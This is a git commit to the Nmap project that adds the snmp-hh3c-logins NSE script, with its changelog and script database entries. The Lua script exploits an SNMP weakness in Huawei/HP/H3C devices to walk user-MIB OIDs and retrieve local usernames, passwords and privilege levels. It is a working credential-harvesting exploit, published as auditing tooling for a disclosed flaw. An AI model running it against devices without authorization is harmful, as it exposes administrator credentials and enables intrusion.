Add snmp-hh3c-logins by Kurt Grutzmacher.

http://seclists.org/nmap-dev/2012/q4/155
2026-01-21 05:39:14 +00:00 · 2012-11-08 07:37:48 +00:00
parent c09a0e440e
commit 54ad2eaede
3 changed files with 149 additions and 0 deletions
--- a/4
+++ b/4
@@ -1,5 +1,9 @@
 # Nmap Changelog ($Id$); -*-text-*-

+o [NSE] Added snmp-hh3c-logins by Kurt Grutzmacher. This script uses a
+  weakness in the SNMP of certain modems to retrieve a list of
+  usernames and passwords.
+
 o [Nsock] Fixed compilation on Windows XP by restricting the use
  of the poll engine to Vista and later. [Gisle Vanem]

--- a/scripts/script.db
+++ b/scripts/script.db
@@ -377,6 +377,7 @@ Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vu
 Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } }
 Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } }
+Entry { filename = "snmp-hh3c-logins.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } }
 Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } }
--- a/scripts/snmp-hh3c-logins.nse
+++ b/scripts/snmp-hh3c-logins.nse
@@ -0,0 +1,144 @@
+local nmap = require "nmap"
+local shortport = require "shortport"
+local snmp = require "snmp"
+local stdnse = require "stdnse"
+
+description = [[
+Attempts to enumerate Huawei / HP/H3C Locally Defined Users through the
+hh3c-user.mib OID
+
+For devices running software released pre-Oct 2012 only an SNMP read-only
+string is required to access the OID. Otherwise a read-write string is
+required.
+
+Output is 'username - password - level: {0|1|2|3}'
+
+Password may be in cleartext, ciphertext or sha256
+Levels are from 0 to 3 with 0 being the lowest security level
+
+https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
+http://grutztopia.jingojango.net/2012/10/hph3c-and-huawei-snmp-weak-access-to.html
+]]
+
+---
+-- @usage
+-- nmap -sU -p 161 --script snmp-hh3c-logins --script-args --script-args snmpcommunity=<community> <target>
+--
+-- @output
+-- | snmp-hh3c-logins:
+-- |   users:
+-- |     admin - admin - level: 3
+-- |_    h3c - h3capadmin - level 0
+
+author = "Kurt Grutzmacher"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"default", "discovery", "safe"}
+dependencies = {"snmp-brute"}
+
+-- Version 0.2
+-- Created 10/01/2012 - v0.1 - created via modifying other walk scripts
+-- Updated 10/25/2012 - v0.2 - bugfixes and better output per NSE standards
+
+
+portrule = shortport.portnumber(161, "udp", {"open", "open|filtered"})
+
+--- Gets a value for the specified oid
+--
+-- @param tbl table containing <code>oid</code> and <code>value</code>
+-- @param oid string containing the object id for which the value should be extracted
+-- @return value of relevant type or nil if oid was not found
+function get_value_from_table( tbl, oid )
+
+	for _, v in ipairs( tbl ) do
+		if v.oid == oid then
+			return v.value
+		end
+	end
+
+	return nil
+end
+
+--- Processes the table and creates the script output
+--
+-- @param tbl table containing <code>oid</code> and <code>value</code>
+-- @return <code>stdnse.output_table</code> formatted table
+function process_answer( tbl )
+
+	-- h3c-user MIB OIDs (oldoid)
+	local h3cUserName = "1.3.6.1.4.1.2011.10.2.12.1.1.1.1"
+	local h3cUserPassword = "1.3.6.1.4.1.2011.10.2.12.1.1.1.2"
+	local h3cUserLevel = "1.3.6.1.4.1.2011.10.2.12.1.1.1.4"
+	local h3cUserState = "1.3.6.1.4.1.2011.10.2.12.1.1.1.5"
+
+	-- hh3c-user MIB OIDs (newoid)
+	local hh3cUserName = "1.3.6.1.4.1.25506.2.12.1.1.1.1"
+	local hh3cUserPassword = "1.3.6.1.4.1.25506.2.12.1.1.1.2"
+	local hh3cUserLevel = "1.3.6.1.4.1.25506.2.12.1.1.1.4"
+	local hh3cUserState = "1.3.6.1.4.1.25506.2.12.1.1.1.5"
+
+	local output = stdnse.output_table()
+	output.users = {}
+	
+	for _, v in ipairs( tbl ) do
+		
+		if ( v.oid:match("^" .. h3cUserName) ) then
+			local item = {}
+			local oldobjid = v.oid:gsub( "^" .. h3cUserName, h3cUserPassword)
+			local password = get_value_from_table( tbl, oldobjid )
+
+			if ( password == nil ) or ( #password == 0 ) then
+				newobjid = v.oid:gsub( "^" .. hh3cUserName, hh3cUserPassword)
+				password = get_value_from_table( tbl, newobjid )
+			end
+
+			oldobjid = v.oid:gsub( "^" .. h3cUserName, h3cUserLevel)
+			local level = get_value_from_table( tbl, oldobjid )
+
+			if ( level == nil ) then
+				newobjoid = v.oid:gsub( "^" .. hh3cUserName, hh3cUserLevel)
+				level = get_value_from_table( tbl, oldobjid )
+			end
+
+			output.users[#output.users + 1] = {username=v.value, password=password, level=level}
+		end
+	
+	end
+	
+	return output
+end
+
+action = function(host, port)
+
+	local socket = nmap.new_socket()
+	local catch = function() socket:close()	end
+	local try = nmap.new_try(catch)	
+	local data, oldsnmpoid = nil, "1.3.6.1.4.1.2011.10.2.12.1.1.1"
+	local data, newsnmpoid = nil, "1.3.6.1.4.1.25506.2.12.1.1.1"
+	local users = {}
+	local status
+
+	socket:set_timeout(5000)
+	try(socket:connect(host, port))
+	
+	status, users = snmp.snmpWalk( socket, oldsnmpoid )
+	socket:close()
+
+	if (not(status)) or ( users == nil ) or ( #users == 0 ) then
+
+		-- no status? try new snmp oid
+		socket:set_timeout(5000)
+		try(socket:connect(host, port))
+		status, users = snmp.snmpWalk( socket, newsnmpoid )
+		socket:close()
+
+		if (not(status)) or ( users == nil ) or ( #users == 0 ) then
+			return users
+		end
+
+	end
+
+	nmap.set_port_state(host, port, "open")
+	return process_answer(users)
+
+end
+